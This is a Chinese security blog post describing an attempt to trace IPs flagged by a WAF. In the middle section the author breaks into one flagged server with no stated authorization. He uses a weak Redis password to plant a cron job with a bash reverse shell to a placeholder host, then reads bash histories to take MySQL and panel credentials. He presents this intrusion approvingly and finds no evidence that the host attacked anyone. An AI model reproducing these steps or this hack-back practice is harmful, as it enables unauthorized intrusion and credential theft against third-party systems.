<!DOCTYPE html>
<html>

    <head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="本站由哨兵安全实验室支持创办">

<link rel="shortcut icon" href="/assets/img/favicon.png">
<link type="application/atom+xml" rel="alternate" href="/feed.xml" title="©「哨兵」| Sentry Security" />



<!-- Open Graph metadata -->
<meta property="og:type" content="website" />
<meta property="og:title" content="CST 2021年 4月14日 星期三：一次朔源事件的记录 | ©「哨兵」| Sentry Security" />
<meta property="og:description" content="本站由哨兵安全实验室支持创办" />
<meta property="og:image" content="http://localhost:80/assets/img/logo-share.png" /> <!-- WeChat requires that thumbnail image is larger than 300x300 -->
<meta property="og:url" content="http://localhost:80/blog/2021/Record-a-suffocating-emergency-response-and-traceability-incident/" />
<title> CST 2021年 4月14日 星期三：一次朔源事件的记录 | ©「哨兵」| Sentry Security | Sentrylab</title>

<link rel="stylesheet" type="text/css" href="/assets/css/pace-minimal.css">
<script src="/assets/js/pace.min.js"></script>


<!-- Bootstrap core CSS -->
<link href="/assets/css/bootstrap.css" rel="stylesheet">
<!-- Custom styles for this template -->
<link href="/assets/css/style.css" rel="stylesheet">
<link href="/assets/css/font-awesome.min.css" rel="stylesheet">
<link href="/assets/css/font-awesome-v4-shims.min.css" rel="stylesheet">
<link rel="stylesheet" href="/assets/css/404-style.css">


<script src="/assets/js/jquery.min.js"></script>
<script src="/assets/js/bootstrap.min.js"></script>




</head>


    <body>
        <!-- Fixed navbar -->
<div class="navbar navbar-default navbar-fixed-top" role="navigation">
  <div class="container">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="/"><!--
   --><picture>
  <source srcset="/assets/img/logo-small-dark.png 1x, /assets/img/logo-small-dark@2x.png 2x, /assets/img/logo-small-dark@3x.png 3x, /assets/img/logo-small-dark@4x.png 4x" media="(prefers-color-scheme: dark)" />
  
  <img src="/assets/img/logo-small.jpg" srcset="/assets/img/logo-small.png 1x, /assets/img/logo-small@2x.png 2x, /assets/img/logo-small@3x.png 3x, /assets/img/logo-small@4x.png 4x" />
  </picture> Sentrylab</a>
    </div>
    <div class="navbar-collapse collapse navbar-right">
      <ul class="nav navbar-nav">
        <li ><a href="/">HOME</a></li>
        <li class="active"><a href="/blog/">BLOG</a></li>
        <li ><a href="/events/">EVENTS</a></li>
        <li ><a href="/categories/">CATEGORIES</a></li>
        <li ><a href="/daily/">DAILY</a></li>
        <li><a href="https://about.sentrylab.cn">ABOUT ME</a></li>
      </ul>
    </div><!--/.nav-collapse -->

  </div>
</div>

            <div class="container mtb">
    <div class="row">
        <!-- SINGLE POST -->
        <div class="col-lg-8">
            <!-- Blog Post  -->
            <a href="/blog/2021/Record-a-suffocating-emergency-response-and-traceability-incident/"><h3 class="ctitle">CST 2021年 4月14日 星期三：一次朔源事件的记录</h3></a>
            <p><csmall>Mar 13, 2021. |  By: Bin4xin.</csmall></p>
            <div class="post-content"> 
            <h3><em>《Bin4xin：我的网安从业朔源事件记录》</em></h3>

<h3 id="零起源">零：起源</h3>

<ul>
  <li>
    <p><em>一日，某护网红队支撑群里发了一份朔源报告，鸦雀无声</em></p>

    <ul>
      <li>
        <p>甲方：小伙伴们接集团要求需对 <em>WAF全流量平台</em> 攻击ip进行朔源…</p>

        <ul>
          <li>废佬：这…（甲方你真可爱）</li>
        </ul>
      </li>
      <li>
        <p>领导1：溯源到攻击端信息是个新的领域，望小伙伴们通过此次集团安排做些尝试性学习和探索，
  落实外部可借力工具和资源，<a href="https://www.github.com/Bin4xin" target="_blank">[@Bin4xin废佬]</a>也加入此次探索学习中。</p>

        <ul>
          <li>废佬：这…（领导你真可爱）</li>
        </ul>
      </li>
      <li>
        <p>领导2：<em>文件：《全流量、WAF4月8日-4月12日攻击IP(1).xlsx》</em></p>
        <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ more 全流量、WAF4月8日-4月12日攻击IP\(1\).csv    
223.214.211.46
36.59.38.115
        
$ more 全流量、WAF4月8日-4月12日攻击IP\(1\).csv|wc -l
16570
</code></pre></div>        </div>
        <ul>
          <li>废佬：这…（领导你真可爱）</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>
    <p>于是废佬就开始了愉快 <em>boring</em> 的朔源之旅</p>
  </li>
</ul>

<h3 id="一上午欢乐时光--fofa安全工程师">一：上午、欢乐时光 &amp; fofa安全工程师</h3>

<blockquote>
  <p>鲁迅：</p>

  <p>不会朔源的fofa安全工程师不是一个好的信息安全工程师</p>
</blockquote>

<h4 id="-1x01awksplit--linux"># 1x01：awk、split &amp; linux</h4>

<ul>
  <li>步入主题之前，先对这些文件进行一些简单的操作：
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  $ split -l 300 全流量、WAF4月8日-4月12日攻击IP\(1\).csv ips_preview_by300_
  $ cat ips_preview_by300_aa|wc -l                     
     300
  $ ll
    total 1400
    drwxr-xr-x  59 bin4xin  staff    1888  4 14 20:48 ./
    drwxr-xr-x+ 43 bin4xin  staff    1376  4 14 20:45 ../
    -rw-r--r--   1 bin4xin  staff    4548  4 14 20:48 ips_preview_by300_aa
    -rw-r--r--   1 bin4xin  staff    4457  4 14 20:48 ips_preview_by300_ab
    -rw-r--r--   1 bin4xin  staff    4481  4 14 20:48 ips_preview_by300_ac
    ··· 
</code></pre></div>    </div>
    <p>这样我们就有了若干个300行ip的小文件，更方便我们筛选我们需要的ip，NEXT。</p>
  </li>
  <li>
    <p>just fofa：</p>

    <p><img src="/assets/img/blog/2021/emergency-response-and-traceability-by-fofa.png" alt="" /></p>
  </li>
</ul>

<h4 id="-1x02something-interesting"># 1x02：Something Interesting</h4>

<ul>
  <li><em>点击以了解 <a href="https://fofa.so/" target="_blank">fofa安全工程师们</a> 与 <a href="https://x.threatbook.cn/" target="_blank">微步安全工程师们</a></em></li>
</ul>

<p><img align="left" src="https://x.threatbook.cn/public/img/logo-in-header.882f692c.png" height="30%" width="50%" />
<img align="right" src="https://fofa.so/_nuxt/img/logo.d9ee5c4.png" height="30%" width="50%" /></p>

<p>欢乐而又短暂的上午如白驹过隙，一晃而过。</p>

<hr />

<h3 id="二下午枯燥时光--渗透测试工程师">二：下午、枯燥时光 &amp; 渗透测试工程师</h3>

<h4 id="-2x01nmapnc--linux-shell"># 2x01：nmap、nc &amp; linux shell</h4>

<p>终于：发现了一些有趣的：</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORT     STATE  SERVICE         VERSION
22/tcp   open   ssh             OpenSSH 6.6.1 (protocol 2.0)
| ssh-hostkey: 
|   2048 fe:03:b9:0b:7b:ab:3f:bf:cd:60:93:57:52:4e:a6:c5 (RSA)
|   256 9d:97:b5:fb:db:92:ed:a7:e3:dd:f9:5f:86:b5:e3:b4 (ECDSA)
|_  256 7b:65:cf:48:84:15:82:ca:be:46:3c:cf:93:63:07:f1 (ED25519)
80/tcp   open   http            nginx
| http-ls: Volume /
| SIZE  TIME               FILENAME
| -     24-Feb-2021 13:21  admin/
| -     24-Feb-2021 09:27  redis/
| -     24-Aug-2017 04:55  staragent/
| -     24-Feb-2021 08:44  www/
| -     24-Feb-2021 08:44  www/htdocs/
| -     13-Apr-2021 19:44  www/logs/
|_
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: Index of /
888/tcp  open   http            nginx
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: 404 Not Found
3306/tcp open   mysql           MySQL 5.5.62-log
6379/tcp open   redis           Redis key-value store
8080/tcp open   http            Apache Tomcat 8.5.63
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: Apache Tomcat/8.5.63
8888/tcp open   http            Ajenti http control panel
</code></pre></div></div>

<ul>
  <li>事实上：这是一个宝塔面板，<code class="language-plaintext highlighter-rouge">8888+888</code>端口；</li>
  <li>另一个事实是：这个被WAF报成<code class="language-plaintext highlighter-rouge">4月8日-4月12日攻击IP</code>的IP， <em>mysql &amp; redis</em> 均为弱口令。
    <ul>
      <li><em><a href="https://xz.aliyun.com/t/8018#toc-8" target="_blank">点击更多以了解redis渗透</a></em></li>
    </ul>
  </li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ./redis-cli -h redis_target_ip           
redis_target_ip:6379&gt; get key
(error) NOAUTH Authentication required.
redis_target_ip:6379&gt; 
redis_target_ip:6379&gt; auth 123456
OK
redis_target_ip:6379&gt; get key
(nil)
redis_target_ip:6379&gt; set  xx   "\n* * * * * bash -i &gt;&amp; /dev/tcp/your_vps_target/port 0&gt;&amp;1\n"
OK
redis_target_ip:6379&gt; config set dir /var/spool/cron/
OK
redis_target_ip:6379&gt; config set dbfilename root
OK
redis_target_ip:6379&gt; save
OK
redis_target_ip:6379&gt; quit
</code></pre></div></div>

<h4 id="-2x02bashinformation-gathering--traceability-incident"># 2x02：bash、Information gathering &amp; Traceability incident</h4>

<p>于是我们通过上面步骤获得了服务器权限；<em>awesome ? next more awesome.</em></p>

<p>通过在服务器的信息搜集，似乎看到了19年刚刚接触服务器的自己，没有任何嘲讽的意思，所有人都是初学者过来的；</p>

<p><em><strong>NO OFFENCE:-)Thanks</strong></em></p>

<ul>
  <li>更加了解linux和linux面板，否则就会显得十分业余，不管你是Development, operation and maintenance or security practitioners；
    <ul>
      <li>匮乏的linux知识导致的过多ssh连接：
        <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  ps -ef|grep ssh|wc -l
  50
</code></pre></div>        </div>
      </li>
      <li>错乱的终端与数据库命令运行：
        <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  $ cat /home/admin/.bash_history 
  sudo grep wordpress_admin_passwd /root/env.txt
  /usr/local/mysql/bin/mysql -u root -p123456
  sudo su rooe
  sudo su root
  sudo grep mysql_root_passwd /root/env.txt
  mysql
  alias mysql=/usr/local/mysql/bin/mysql
  mysql
  find / -name mysql.sock
  sudo grep mysql_root_passwd /root/env.txt
  msyql
  sudo su root
  grant all privileges on *.* to 'root'@'%' identified by 'pass-hidden';
  grant all privileges on *.* to 'root'@'%' identified by '123456';
</code></pre></div>        </div>
      </li>
      <li>错误的linux权限分配：
        <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  $ ps -ef|grep root
  root      7963     1  0 Mar06 ?        00:39:39 /usr/bin/java -Djava.util.logging.config.file=/www/server/apache-tomcat-8.5.63/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Dignore.endorsed.dirs= -classpath /www/server/apache-tomcat-8.5.63/bin/bootstrap.jar:/www/server/apache-tomcat-8.5.63/bin/tomcat-juli.jar -Dcatalina.base=/www/server/apache-tomcat-8.5.63 -Dcatalina.home=/www/server/apache-tomcat-8.5.63 -Djava.io.tmpdir=/www/server/apache-tomcat-8.5.63/temp org.apache.catalina.startup.Bootstrap start
  root     23017     1  0 Mar06 ?        00:00:00 nginx: master process nginx -c conf/nginx.conf
  root     27803     1  0 Feb25 ?        01:17:18 ./redis-server *:6379
  ···
</code></pre></div>        </div>
      </li>
    </ul>
  </li>
  <li>同样的：通过history找到面板管理密码；
    <ul>
      <li>tools.py form BT panel：
        <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  $ cat /root/.bash_history |grep tools
  cd /www/server/panel &amp;&amp; python tools.py panel pass-hidden
  $ cat /www/server/panel/tools.py
        
  if __name__ == "__main__":
      type = sys.argv[1]
      if type == 'root':
          set_mysql_root(sys.argv[2])
      elif type == 'panel':
          set_panel_pwd(sys.argv[2])
</code></pre></div>        </div>
      </li>
    </ul>
  </li>
</ul>

<p>所以，panel模式下对应的是面板密码设置；</p>

<p><img src="/assets/img/blog/2021/stupid-bt-panel-control-pic.png" alt="" />
至此，我们获得了 <em>root、redis、mysql、BT panel</em> ；而本文并炫技，我们的初衷是朔源：</p>

<ul>
  <li><em>mysql</em>：数据库仅仅是存放论坛系统管理的信息及测试信息；</li>
  <li><em>redis</em>：配合 <em>mysql</em>，不必多说；</li>
  <li><em>BT panel：www、ftp、sql</em> 等配置均为简单配置，没有参考价值。</li>
</ul>

<h3 id="三总结">三：总结</h3>

<ul>
  <li>1、本篇文章的存在意为信息搜集、朔源方向上的抛砖引玉，文笔不佳；</li>
  <li>2、结合 <em># 2x01 及 # 2x02</em> 小结通篇结束并未发现攻击迹象、痕迹；</li>
  <li>3、为何被报为攻击IP不得而知。</li>
</ul>

<p>以上。</p>

            </div>
            <div class="spacing"></div>
            <div>
	<div class="hline"></div>
	<h3><em>#</em> 申明</h3>
	<div class="spacing"></div>
	<h4><em>By: Bin4xin.</em></h4>
	<h4>转载请申明本文链接：<a href="/blog/2021/Record-a-suffocating-emergency-response-and-traceability-incident/" target="_blank"> CST 2021年 4月14日 星期三：一次朔源事件的记录</a></h4>

	<h3><em># Any Questions</em></h3>
	<div class="spacing"></div>
	<h4> >_ 对本文进行提问：<a href="https://github.com/Bin4xin/bin4xin.github.io/issues/new?permalink=https://github.com/Bin4xin/bin4xin.github.io/blob/1b4fffa6232dc6ffa2cece8be0d6c39e0c5f9cfe/blog/2021/Record-a-suffocating-emergency-response-and-traceability-incident/index.html%23L84" target="_blank"> <em><li class="fa fa-github"></li> Reference in new issue.</em></a></h4>

	<h4> >_ 对本文进行留言：<a href="https://github.com/Bin4xin/bin4xin.github.io/issues/new?permalink=https://bin4xin.github.io/blog/2021/Record-a-suffocating-emergency-response-and-traceability-incident/" target="_blank"> <em><li class="fa fa-github"></li> Leave a Comment.</em></a></h4>
	<div class="spacing"></div>
</div>
        </div><!--/col-lg-8 -->
        
        <div class="col-lg-3">
    <h4>Subscribe/订阅</h4>
    <div class="hline"></div>
        <p>
        <p class="rss-subscribe"><i class="fa fa-rss"></i> Subscribe to this blog <a href="/feed.xml">via RSS</a>.</p>
        </p>
    <div class="spacing"></div>
    <h4>Categories/分类目录</h4>
    <div class="hline"></div>
        
        <div class="post-meta mb-3">
        <div class="spacing"></div>
<!--          <i class="far fa-folder-open fa-fw mr-1"></i>-->
<!--          -->
<!--            <a href='/blog/'>blog</a>-->
<!---->
<!--          -->
<!--            <a href='/%E4%B8%BB%E5%8A%A8%E9%98%B2%E5%BE%A1/'>主动防御</a>-->
<!---->
<!--          -->
<!--            <a href='/%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/'>信息搜集</a>-->
<!---->
<!--          -->
<!--            <a href='/%E7%AC%94%E8%AE%B0/'>笔记</a>-->
<!---->
<!--          -->
            <details>
                <summary class="point">本文分类</summary>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/blog/'>blog</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/%E4%B8%BB%E5%8A%A8%E9%98%B2%E5%BE%A1/'>主动防御</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/'>信息搜集</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/%E7%AC%94%E8%AE%B0/'>笔记</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
            </details>
        </div>
        
        <p>
    <details>
        <summary class="point">所有标签/数量</summary>
        
        <p>
            <i class="fa fa-angle-right"></i> Web
            <span class="badge badge-theme pull-right">11</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 漏洞复现
            <span class="badge badge-theme pull-right">9</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 渗透
            <span class="badge badge-theme pull-right">8</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Vulnhub
            <span class="badge badge-theme pull-right">6</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 安全工具
            <span class="badge badge-theme pull-right">5</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 笔记
            <span class="badge badge-theme pull-right">32</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 软件移植
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Arm
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 主动防御
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 技巧
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Android reverse
            <span class="badge badge-theme pull-right">4</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 排错
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Waf
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Maven
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Python
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Terminal
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Docker
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Cve
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Sql-inject
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Bash
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 内网
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 信息搜集
            <span class="badge badge-theme pull-right">6</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Fuzz
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Vulnhub
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Src
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Daily
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
    </details>
    <div class="spacing"></div>

    <h4>Tags/标签</h4>
    <div class="hline"></div>
    <p>
        
            <a class="btn btn-theme" href='/' role="button">Web (11)</a>
        
            <a class="btn btn-theme" href='/' role="button">漏洞复现 (9)</a>
        
            <a class="btn btn-theme" href='/' role="button">渗透 (8)</a>
        
            <a class="btn btn-theme" href='/' role="button">Vulnhub (6)</a>
        
            <a class="btn btn-theme" href='/' role="button">安全工具 (5)</a>
        
            <a class="btn btn-theme" href='/' role="button">笔记 (32)</a>
        
            <a class="btn btn-theme" href='/' role="button">软件移植 (2)</a>
        
            <a class="btn btn-theme" href='/' role="button">Arm (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">主动防御 (2)</a>
        
            <a class="btn btn-theme" href='/' role="button">技巧 (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Android reverse (4)</a>
        
            <a class="btn btn-theme" href='/' role="button">排错 (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Waf (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Maven (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Python (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Terminal (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Docker (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Cve (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Sql-inject (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Bash (2)</a>
        
            <a class="btn btn-theme" href='/' role="button">内网 (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">信息搜集 (6)</a>
        
            <a class="btn btn-theme" href='/' role="button">Fuzz (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Vulnhub (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Src (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Daily (2)</a>
        
    </p>
    <div class="spacing"></div>

    <h4>Article Directory/文章目录</h4>
    <div class="hline"></div>
    <p>
        <ul id="toc" class="section-nav">
<li class="toc-entry toc-h3"><a href="#bin4xin%E6%88%91%E7%9A%84%E7%BD%91%E5%AE%89%E4%BB%8E%E4%B8%9A%E6%9C%94%E6%BA%90%E4%BA%8B%E4%BB%B6%E8%AE%B0%E5%BD%95">《Bin4xin：我的网安从业朔源事件记录》</a></li>
<li class="toc-entry toc-h3"><a href="#零起源">零：起源</a></li>
<li class="toc-entry toc-h3"><a href="#一上午欢乐时光--fofa安全工程师">一：上午、欢乐时光 &amp; fofa安全工程师</a>
<ul>
<li class="toc-entry toc-h4"><a href="#-1x01awksplit--linux"># 1x01：awk、split &amp; linux</a></li>
<li class="toc-entry toc-h4"><a href="#-1x02something-interesting"># 1x02：Something Interesting</a></li>
</ul>
</li>
<li class="toc-entry toc-h3"><a href="#二下午枯燥时光--渗透测试工程师">二：下午、枯燥时光 &amp; 渗透测试工程师</a>
<ul>
<li class="toc-entry toc-h4"><a href="#-2x01nmapnc--linux-shell"># 2x01：nmap、nc &amp; linux shell</a></li>
<li class="toc-entry toc-h4"><a href="#-2x02bashinformation-gathering--traceability-incident"># 2x02：bash、Information gathering &amp; Traceability incident</a></li>
</ul>
</li>
<li class="toc-entry toc-h3"><a href="#三总结">三：总结</a></li>
</ul>
    </p>

</div>


    </div><!--/row -->
        
</div><!--/container -->


        <div id="footerwrap">
    <div class="container">
        <div class="row">
            <div class="col-sm-4">
                <div class="col-sm-6">
                  <p class="thuhidden"><strong>入门</strong></p>
                  <p class="thuhidden"><a href="https://github.com/tuna/mirror-web" target="blank"><em>Jekyll</em>源码</a></p>
                  <p class="thuhidden"><a href="https://www.sentrylab.cn/blog/2019/jekyll/in/linux" target="blank">博客搭建教程</a></p>
                  <p class="thuhidden"><a href="https://about.sentrylab.cn/news/sentry-lab-markdown-usage/" target="blank">个性化语法批注</a></p>
                  <p class="thuhidden"><a href="https://www.sentrylab.cn/blog/2019/nginx/with/jekyll-site/" target="blank">公网部署</a></p>
                  </div>

                  <div class="col-sm-6">
                  <p class="thuhidden"><strong>社区</strong></p>
                  <p class="thuhidden"><a href="/blog" target="blank">博客</a></p>
                  <p class="thuhidden"><a href="https://github.com/Bin4xin/bigger-than-bigger/tree/master/CoVV" target="blank"><em>Collection of verified vulnerabilities</em></a></p>
                  <p class="thuhidden"><a href="https://github.com/Bin4xin/bigger-than-bigger" target="blank"><em>Bigger than Bigger</em></a></p>
                  <p class="thuhidden"><a href="https://github.com/Bin4xin/B4xinSynchronize" target="blank"><em>B4xinSynchronize</em></a></p>
                  </div>
            </div>

        <div class="col-sm-4">
                  <div class="col-sm-6">
                    <p class="thuhidden"><strong>开发</strong></p>
                    <p class="thuhidden"><a href="https://github.com/Bin4xin/Bin4xin" target="blank"><em>Bin4xin</em></a></p>
                    <p class="thuhidden"><a href="https://www.cloudflare.com/waf/" target="blank"><em>CloudFlare WAF</em></a></p>
                    <p class="thuhidden"><a href="https://jekyllrb.com/docs/" target="blank"><em>Jekyll</em></a></p>
                    <p class="thuhidden"><a href="https://www.markdownguide.org/" target="blank"><em>MarkDown</em></a></p>
                    <p class="share">
                    <a href="https://github.com/Bin4xin/" target="blank"><i class="fa fa-github"></i></a>
                    <a href="https://twitter.com/Bin4xin"><i class="fa fa-twitter" target="blank"></i></a>
                    <a href="#"><i class="fa fa-facebook" target="blank"></i></a>
                    </p>
                  </div>

                  <div class="col-sm-6">
                    <p class="thuhidden"><strong>关于</strong></p>
                    <p class="thuhidden"><a href="https://about.sentrylab.cn/" target="blank">近期研究</a></p>
                    <p class="thuhidden">∑ <csmall>(Visitors/times)</csmall></em></p>
                    <img src="https://profile-counter.glitch.me/bin4xin.github.io/count.svg" style="max-width:100%;">
                  </div>
            </div>

        <div class="col-sm-4">
          
          <picture>
  <img src="/assets/img/logo-small@3x.jpg" srcset="/assets/img/logo-small@3x.png 1x" />
  </picture>

        </div>
        </div><!--/row -->
      <p class="thuhidden">© 2019-2021 SentrySec, Lab. Build by Jekyll under the terms of the MIT License.</p>
    </div><!--/container -->
</div><!--/footerwrap -->
    </body>
</html>